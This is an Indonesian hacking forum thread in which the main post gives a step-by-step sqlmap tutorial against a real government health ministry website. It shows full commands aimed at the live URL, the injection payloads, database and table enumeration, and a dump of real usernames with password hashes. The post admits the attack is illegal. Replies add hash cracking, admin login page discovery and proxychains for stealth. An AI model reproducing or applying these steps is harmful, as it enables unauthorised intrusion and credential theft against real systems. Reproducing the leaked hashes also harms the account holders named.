sqlmap how to
#11
(10-20-2011, 10:42 PM)betefive Wrote: bro... file py nya ada ga?

sqlmap udah ada di backtrack bro .,.. ngapain nyari2 lagi ?

#12
bro buatin video nya aja biar tambah ngerti yang pengguna baru kyk ane

#13
om untuk URL nya mesti pke tanda kutip yah..??


#14
om, untuk meng decrypt passowrdnya gimana?


#15
mantabssss......nice share om Big Grin
shendo@IBT:~# whoami
root
shendo@IBT:~# id
uid=0(root) gid=0(root) groups=0(root)
shendo@IBT:~#_

#16
(11-27-2011, 01:42 AM)rahmat2222 Wrote: om, untuk meng decrypt passowrdnya gimana?

coba lihat disini:
http://forum.indonesianbacktrack.or.id/s...findmyhash

findmyhash bisa buat cracking password dengan bermacam algoritma Big Grin

#17
klo untuk mencari halaman loginnya gimana?

maaf, nanya terus

#18
(11-27-2011, 08:40 PM)rahmat2222 Wrote: klo untuk mencari halaman loginnya gimana?

maaf, nanya terus


coba2.
halaman default admin
seperti :
index.php/administrator [Joomla]
index.php/admin [Joomla]
http://forum.indonesianbacktrack.or.id/admin/ [Mybb]
index.php/wp-admin [Wordpress]

Dan lainnya.
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#19
(11-27-2011, 08:49 PM)THJC Wrote:
(11-27-2011, 08:40 PM)rahmat2222 Wrote: klo untuk mencari halaman loginnya gimana?

maaf, nanya terus


coba2.
halaman default admin
seperti :
index.php/administrator [Joomla]
index.php/admin [Joomla]
http://forum.indonesianbacktrack.or.id/admin/ [Mybb]
index.php/wp-admin [Wordpress]

Dan lainnya.
kaya di protek ya...

soalnya, klo ke sini : http://www.depkes.go.id/administrator , ke redirect halaman awal

#20
(10-19-2011, 02:31 AM)guitariznoize Wrote: halo gays, kemarin pas ujian semester di TK Cendrawasih, saya mendapatkan soal disuruh ngejelasin sqlmap, saya yakin ini tugas dari Bu Wiwid.

ini adalah contoh tutorial sederhana dengan sqlmap, adapun troubleshooting tentang sqlmap dan lain lain akan saya buat di next tutorial.

“sqlmap adalah tools untuk melakukan testing penetrasi sql injection pada suatu web, tools ini menurut saya, tools sql injection yang free paling lengkap untuk saat ini, walaupun ada havij, tapi menurut saya havij kurang advanced, havij lebih banyak dipakai oleh pengguna baru pengguna baru, karena memang kegunaan nya yang sangat simple untuk sekali attack sql injection.”

kali ini saya kasih contoh di http://www.depkes.go.id/, dengan flaws di component joomla depkesdownload.

*perhatian apa yang saya ajarkan ialah ilegal, penggunaan materi ini semata mata untuk tujuan pembelajaran, dan pihak ke tiga atau ke dua dimohon untuk pemahaman nya ini semata semata AUDIT Gratis dari saya tentang website depkes, sebelum ada hacker yang melakukan perusakan terhadap web tersebut.

saya akan selalu menggunakan flag default –threads dan –random-agent dengan kegunaan :

Code:
--threads : max number sqlmap mencoba untuk membuka concurrent http connections.
--random-agent : load random user agent dari default sqlmap,

total user agent yang bisa digunakan ialah 2078 random user agent.

Code:
$ wc txt/user-agents.txt
  2078  23092 198475 txt/user-agents.txt

penggunaan sqlmap secara standart :

Code:
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump --dumpall

1. test injeksi dengan men-fetch banner mysql (versi mysql)

Code:
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --banner

   sqlmap/1.0-dev (r4370) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:09:14

[22:09:14] [INFO] fetched random HTTP User-Agent header from file '/root/sqlmap-dev/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5
[22:09:15] [INFO] using '/root/sqlmap-dev/output/www.depkes.go.id/session' as session file
[22:09:15] [INFO] testing connection to the target url
[22:09:15] [INFO] testing if the url is stable, wait a few seconds
[22:09:16] [INFO] url is stable
---8<------ snip
[22:11:31] [INFO] GET parameter 'folderid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[22:11:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[22:11:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[22:11:36] [INFO] testing 'Generic UNION query with Microsoft Access (%00) comment (NULL) - 1 to 10 columns'
GET parameter 'folderid' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 445 HTTP(s) requests:
---
Place: GET
Parameter: folderid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: option=com_depkesdownload&itemid=21&folderid=51' AND 8184=8184 AND 'TEzv'='TEzv

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: option=com_depkesdownload&itemid=21&folderid=51' AND SLEEP(5) AND 'ISyk'='ISyk
---

[22:14:12] [INFO] the back-end DBMS is MySQL
[22:14:12] [INFO] fetching banner
[22:14:12] [INFO] retrieving the length of query output
[22:14:12] [INFO] retrieved: 6
[22:14:21] [INFO] retrieved: 5.0.45
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
banner:    '5.0.45'

[22:14:21] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 198 times
[22:14:21] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'

[*] shutting down at 22:14:21

apa yang saya lakukan pertama kali untuk memfetch banner dari dbms itu penting, karena dengan melakukan injeksi pancingan ke web, sqlmap akan mendapatkan route map dari injeksi website tersebut, sehingga serangan injeksi selanjutnya akan lebih mudah bagi sqlmap.

pada awal injeksi menggunakan sqlmap, disarankan untuk men-fetch banner terlebih dahulu, dengan metode tebak tebak an injeksi ini sqlmap akan lebih gampang membuild road map dari jenis injeksi dbms si website, sekedar sharing saya pernah tidak men-fetch banner terlebih dahulu melainkan langsung dengan metode –dbs, namun hasilnya gagal, ketika dicoba lain kali dengan injeksi –banner sqlmap berhasil men-injeksi web tersebut, dan viola kesana nya pun sqlmap mudah untuk fetch data.

dari hasil injeksi fetch banner mysql, kita mendapatkan positive impact dari target, yaitu keluarnya hasil untuk versi DBMS yaitu : MySQL 5.0.11 dengan tipe injeksi MySQL Blind.

2. fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db)
langkah ke dua ialah analisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut.

Code:
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --current-user --current-db

--------8<--- snip

[22:24:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
[22:24:23] [INFO] fetching current user
[22:24:23] [INFO] retrieving the length of query output
[22:24:23] [INFO] read from file '/root/sqlmap-dev/output/www.depkes.go.id/session': 20
[22:24:46] [INFO] retrieved: website-in@localhost
current user:    'website-in@localhost'

[22:24:46] [INFO] fetching current database
[22:24:46] [INFO] retrieving the length of query output
[22:24:46] [INFO] retrieved: 6
[22:24:55] [INFO] retrieved: portal
current database:    'portal'

[22:24:55] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'

[*] shutting down at 22:24:55

3. fetch list database yang bisa dihandle oleh user website-in@localhost dengan flag (--dbs)
selanjutnya kita melakukan fetching list database, dengan mengetahui list databse yang lain kita dapat bebas melakukan injeksi pada setiap database yang available untuk di injeksi.

Code:
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --dbs

--------8<--- snip

[22:36:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
[22:36:06] [INFO] fetching database names
[22:36:06] [INFO] fetching number of databases
[22:36:06] [INFO] retrieved: 2
[22:36:08] [INFO] retrieving the length of query output
[22:36:08] [INFO] retrieved: 18
[22:36:31] [INFO] retrieved: information_schema
[22:36:31] [INFO] retrieving the length of query output
[22:36:31] [INFO] retrieved: 6
[22:36:40] [INFO] retrieved: portal
available databases [2]:
[*] information_schema
[*] portal

[22:36:40] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'

[*] shutting down at 22:36:40

ternyata hanya 2 database yang avail, yaitu information_schema dan database portal, kita langsung injeksi untuk database portal saja yah, information_schema nya silahkan googling sendiri.

4. fetch list tables di database portal dengan flag (-D portal --tables)

Code:
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal --tables

karena log / verbose yang dihasilkan panjang sekali, kita bisa langsung cek hasil dari setiap log injeksi di folder output/web

berikut contoh list tables yang berhasil di injeksi dari database portal, ada 89 tables.

Code:
root@ubuntu:~/sqlmap-dev/output/www.depkes.go.id# cat log

-----8<---- snip ---

Database: portal
[89 tables]
+------------------------------+
| jos_assignments              |
| jos_banner                   |
| jos_bannerclient             |
| jos_bannertrack              |
| jos_categories               |
| jos_components               |
| jos_contact_details          |
| jos_content                  |
| jos_content_frontpage        |
| jos_content_rating           |
| jos_core_acl_aro             |
| jos_core_acl_aro_groups      |
| jos_core_acl_aro_map         |
| jos_core_acl_aro_sections    |
| jos_core_acl_groups_aro_map  |
| jos_core_log_items           |
| jos_core_log_searches        |
| jos_downloads                |
| jos_downloads_blob           |
| jos_downloads_category       |
| jos_downloads_classify       |
| jos_downloads_containers     |
| jos_downloads_file_classify  |
| jos_downloads_files          |
| jos_downloads_folders        |
| jos_downloads_log            |
| jos_downloads_repository     |
| jos_downloads_reviews        |
| jos_downloads_structure      |
| jos_downloads_text           |
| jos_groups                   |
| jos_hwdvidsantileech         |
| jos_hwdvidscategories        |
| jos_hwdvidsfavorites         |
| jos_hwdvidsflagged_groups    |
| jos_hwdvidsflagged_videos    |
| jos_hwdvidsgroup_membership  |
| jos_hwdvidsgroup_videos      |
| jos_hwdvidsgroups            |
| jos_hwdvidsgs                |
| jos_hwdvidslogs_archive      |
| jos_hwdvidslogs_favours      |
| jos_hwdvidslogs_views        |
| jos_hwdvidslogs_votes        |
| jos_hwdvidsplugin            |
| jos_hwdvidsrating            |
| jos_hwdvidsss                |
| jos_hwdvidsvideos            |
| jos_jdownloads_cats          |
| jos_jdownloads_config        |
| jos_jdownloads_files         |
| jos_jdownloads_license       |
| jos_jdownloads_templates     |
| jos_menu                     |
| jos_menu_types               |
| jos_messages                 |
| jos_messages_cfg             |
| jos_migration_backlinks      |
| jos_mod_apotik               |
| jos_mod_puskesmas            |
| jos_mod_puskesmas15072011    |
| jos_mod_puskesmas24112010    |
| jos_mod_puskesmas_23012011   |
| jos_mod_puskesmas_old        |
| jos_mod_rumah_sakit          |
| jos_modules                  |
| jos_modules_menu             |
| jos_newsfeeds                |
| jos_permissions              |
| jos_phocadownload            |
| jos_phocadownload_categories |
| jos_phocadownload_licenses   |
| jos_phocadownload_sections   |
| jos_phocadownload_settings   |
| jos_phocadownload_user_stat  |
| jos_plugins                  |
| jos_poll_data                |
| jos_poll_date                |
| jos_poll_menu                |
| jos_polls                    |
| jos_rokdownloads             |
| jos_rokversions              |
| jos_sections                 |
| jos_session                  |
| jos_stats_agents             |
| jos_swmenufree_config        |
| jos_templates_menu           |
| jos_users                    |
| jos_weblinks                 |
+------------------------------+

5. fetch isi kolum pada setiap tables dengan flag (--columns)

setelah itu mari kita ke final step pada setiap langkah langkah menginjeksi suatu web, yaitu memfetch isi dari tables. karena tabel yang menarik dari list diatas yaitu tabel users, maka langsung kita fetch isi tabel tersebut

sebelumnya kita fetch dulu list kolum pada tabel tersebut, dan fetch data dari kolum hanya yang penting saja, kita fetch dengan flag (-D portal -T jos_users --columns)

Code:
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal -T jos_users --columns

----8<----snip

+---------------+---------------------+
| Column        | Type                |
+---------------+---------------------+
| activation    | varchar(100)        |
| block         | tinyint(4)          |
| email         | varchar(100)        |
| gid           | tinyint(3) unsigned |
| id            | int(11)             |
| lastvisitDate | datetime            |
| name          | varchar(255)        |
| params        | text                |
| password      | varchar(100)        |
| registerDate  | datetime            |
| sendEmail     | tinyint(4)          |
| username      | varchar(150)        |
| usertype      | varchar(25)         |
+---------------+---------------------+

[02:39:42] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'

[*] shutting down at 02:39:42

sekarang kita akan men-fetch hanya isi dari kolum (username, dan password), dengan flag (-D portal -T jos_users -C username,password --dump), flag --dump berguna untuk men-dump isi dari kolum kedalam log sqlmap sehingga bisa kita liat secara permanen di hardisk tanpa melakukan injeksi ulang (logging)

Code:
root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal -T jos_users -C username,password --dump

hasil yang terlog di folder log/web

Code:
root@ubuntu:~/sqlmap-dev# cat output/www.depkes.go.id/log

----------8<----snip

Database: portal
Table: jos_users
[11 entries]
+-------------------------------------------------------------------+---------------+
| password                                                          | username      |
+-------------------------------------------------------------------+---------------+
| 35d1b3c70e13825c0d4a67843adbf6ef:sQEMDKp8NKGSLMMKP5DocOSMwO1uCV3l | admin         |
| f45161dd4038a5946c1dbcc59dbc0d6a:JUYQ0bIg2mt0XrIotHzVRw4yTowVCgIi | andri         |
| 06b60c7bbdd5e197810d9018c3640ccd:MXghhJp9fJc8uadkcrZC30dZhyn3JnK7 | dewi_roro     |
| 1e41bc000f1461a1410823fcdd7f0c22:eNKOmRJO35Mxa5PqI8jJAxAR7mN4qPxO | ipunk         |
| 30f9ade9382291ffaf41ba0e35fa54ca:EOnhJGXlt5LLl0cefNLleOYQ8OCCgloc | ismail        |
| d8c27e4de63a2c48e4a66ec8d88160c8:I30jspHGk6lPca18gwX1k069vqopqnoc | isti          |
| faf5fc5f3d5901d79a396c62cacdc639:dRzIfNbjgAkj5Bco281VE1y6PiaKQLLa | Miemie Widya  |
| 42fac0d700127746caac2c225b1f0427:pGFxjurnXno3dLMZMxwhdGe65NsI0zDl | puskom        |
| d7c49e113aca936ed03c452c71784e7b:7mABDrLJBxFSbLyiDTcCi2Xr5agcxeGc | rsud meureudu |
| 27a94db23c3d203edbcd7314a998bf9e:R3x0ypx8lbe7yrAylDbixbf0pDdZ2KDb | silver        |
| 50a09da3b0d90b736e939862ef565c4d:YGJbFZxWVEayGlylKuyLvmY5wadgQy5K | supriyono     |
+-------------------------------------------------------------------+---------------+

adapun csv dari hasil dump ada berada di subfolder dump di setiap folder log web tersebut

[Image: untitled.png]

untuk melakukan full dump satu kolum bisa menggunakan flag (-D portal -T jos_users --columns --dump) namun isinya berantakan dikarenakan banyak jumlah kolum, jadi lebih baik kita fetch kolum yang dianggap perlu saja, berikut dari hasil full dump untuk tabel jos_users : jos_users.txt

hal terbaik dari teknik sql injection menggunakan tools ialah jika digabungkan dengan tools proxychains, yang akan menghasilkan tools hack website yang stealth, powerfull namun sederhana.

Good Luck!


Source

nice om, lengkap Big Grin
Huh lanjooooooottttttttttttttttttttttttttttttttttt Confused






Users browsing this thread: 1 Guest(s)